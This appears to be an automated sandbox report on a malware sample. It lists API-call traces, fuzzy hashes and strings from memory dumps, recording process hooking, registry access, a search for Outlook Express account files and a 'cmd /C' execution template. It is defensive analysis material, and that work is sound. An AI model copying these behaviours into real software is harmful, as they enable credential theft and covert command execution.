  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
